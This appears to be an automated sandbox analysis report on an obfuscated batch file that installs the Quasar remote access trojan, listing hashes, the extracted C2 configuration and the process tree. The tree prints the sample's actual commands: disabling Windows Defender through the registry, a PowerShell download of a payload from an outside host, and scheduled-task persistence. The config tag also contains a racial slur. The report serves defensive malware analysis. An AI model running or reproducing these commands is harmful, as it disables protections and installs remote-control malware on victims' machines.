Analysis
-
max time kernel
14s -
max time network
16s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
24-12-2024 17:24
Static task
static1
Behavioral task
behavioral1
Sample
FUD RAT___Obfuscated.bat
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
FUD RAT___Obfuscated.bat
Resource
win10v2004-20241007-en
General
-
Target
FUD RAT___Obfuscated.bat
-
Size
463B
-
MD5
a9fdda2577ff67660be21d0d4cd98179
-
SHA1
15432871fed4cbb19ec26eaabcc6b193beebbbfb
-
SHA256
8f18705cf5653667888ea5f2440e984d22c5207e7e5e2fccb68e7ad71f58bb83
-
SHA512
0f43e8b47bdd9d1a2ce65db49868f7698b83bcb5f8d249a29078793e5ca48d75bf8ce99dae00f772c28b766ac761040c0113d9034e7e7d35efb75b39eca5153d
Malware Config
Extracted
https://whatsabool.online/kingvonpiracyvirus/load.exe
Extracted
quasar
1.4.1
Dumb Niggas
85.209.133.15:111
95ddd19c-037b-4e62-8c64-298b31d663b8
-
encryption_key
04FB780AC53244A8569349610FCC9CFEE3EEB90D
-
install_name
Client.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
system
-
subdirectory
SubDir
Signatures
-
Quasar family
-
Quasar payload 2 IoCs
resource yara_rule behavioral2/files/0x0009000000023c8f-18.dat family_quasar behavioral2/memory/2040-20-0x0000000000A70000-0x0000000000D92000-memory.dmp family_quasar -
Blocklisted process makes network request 1 IoCs
flow pid Process 7 4436 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 2 IoCs
pid Process 2040 load.exe 640 Client.exe -
pid Process 4436 powershell.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2404 schtasks.exe 4072 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 4436 powershell.exe 4436 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 4436 powershell.exe Token: SeDebugPrivilege 2040 load.exe Token: SeDebugPrivilege 640 Client.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 640 Client.exe -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 1132 wrote to memory of 3252 1132 cmd.exe 83 PID 1132 wrote to memory of 3252 1132 cmd.exe 83 PID 1132 wrote to memory of 4436 1132 cmd.exe 84 PID 1132 wrote to memory of 4436 1132 cmd.exe 84 PID 1132 wrote to memory of 2040 1132 cmd.exe 86 PID 1132 wrote to memory of 2040 1132 cmd.exe 86 PID 2040 wrote to memory of 2404 2040 load.exe 88 PID 2040 wrote to memory of 2404 2040 load.exe 88 PID 2040 wrote to memory of 640 2040 load.exe 90 PID 2040 wrote to memory of 640 2040 load.exe 90 PID 640 wrote to memory of 4072 640 Client.exe 91 PID 640 wrote to memory of 4072 640 Client.exe 91 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\FUD RAT___Obfuscated.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1132 -
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f2⤵PID:3252
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://whatsabool.online/kingvonpiracyvirus/load.exe', 'C:\Users\Admin\AppData\Local\Temp\load.exe')"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4436
-
-
C:\Users\Admin\AppData\Local\Temp\load.exe"C:\Users\Admin\AppData\Local\Temp\load.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2040 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "system" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f3⤵
- Scheduled Task/Job: Scheduled Task
PID:2404
-
-
C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:640 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "system" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f4⤵
- Scheduled Task/Job: Scheduled Task
PID:4072
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
3.1MB
MD568b6e948c723b1127c027d2dc9505a13
SHA1e8056196a1ada4f7c266d4d5417d02492b4fbe6e
SHA256cb311e549d10e963d612cefd4fa5ca5d49f0f3b16db3525823e811ec58ec6ebb
SHA512079eb9475d5984a95590387d2ed32fda030785ae1911a1e8a7e7732e3d62e313a88769b96122814a077fb1824424e6f82bcc415e89e7f1d1e981b052a4172761